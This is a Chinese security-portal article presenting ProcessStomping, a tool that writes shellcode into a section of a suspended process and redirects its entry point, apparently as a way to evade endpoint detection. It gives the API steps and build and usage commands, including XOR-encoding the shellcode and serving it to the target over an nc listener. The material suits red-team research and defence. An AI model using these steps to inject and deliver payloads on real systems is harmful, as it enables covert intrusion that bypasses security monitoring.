freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用ProcessStomping在可执行程序的字段部分执行Shellcode
2024-01-15 00:48:18

关于ProcessStomping

ProcessStomping是一款功能强大的Shellcode代码执行工具,该工具允许广大研究人员在目标可执行程序的指定字段部分执行Shellcode代码。

ProcessStomping实际上是Process Overwriting项目的一个升级版本,并且能够向目标应用程序的指定字段部分写入Shellcode Payload,而不是直接将整个PE Payload写入到目标进程的整个地址空间。

工具运行机制

下面给出的是ProcessStomping技术的主要运行步骤:

1、CreateProcess:给CREATE_SUSPENDED(0x00000004)设置Process Creation标记,以挂起目标进程的主线程;

2、WriteProcessMemory:用于向目标进程字段写入每一个恶意Shellcode;

3、SetThreadContext:用于将入口点指向一个新的代码字段(写入了Shellcode的字段);

4、ResumeThread:恢复线程执行;

下图显示的是ProcessStomping如何向目标应用程序的RWX字段写入Shellcode:

工具安装

由于该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/naksyn/ProcessStomping.git

工具使用

选择好你的目标进程,然后修改ProcessStomping.cpp中相应的全局变量。

然后编译sRDI项目,确保偏移量足够允许你跳转到生成的sRDI Shellcode代码块,然后运行下列命令更新sRDI工具:

cd ProcessStomping

cd sRDI-master

python .\lib\Python\EncodeBlobs.py .\

根据需要生成一个Reflective-Loaderless DLL Payload,然后生成sRDI Shellcode代码块:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

接下来,工具会使用一个键值对异或计算生成的Shellcode代码块,并通过一个简单的socket下载到目标设备上:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

通过socket连接发送经过异或计算的Shellcode代码块:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

sRDI代码块和其他非必要组件将会在Shellcode成功执行之后被删除。

工具运行截图

工具使用演示

演示视频:【点我观看

项目地址

ProcessStomping:【GitHub传送门

参考资料

https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html

https://github.com/hasherezade/process_overwriting

https://www.freebuf.com/sectool/181426.html

# payload # shellcode # 代码注入 # 代码执行 # 内存安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录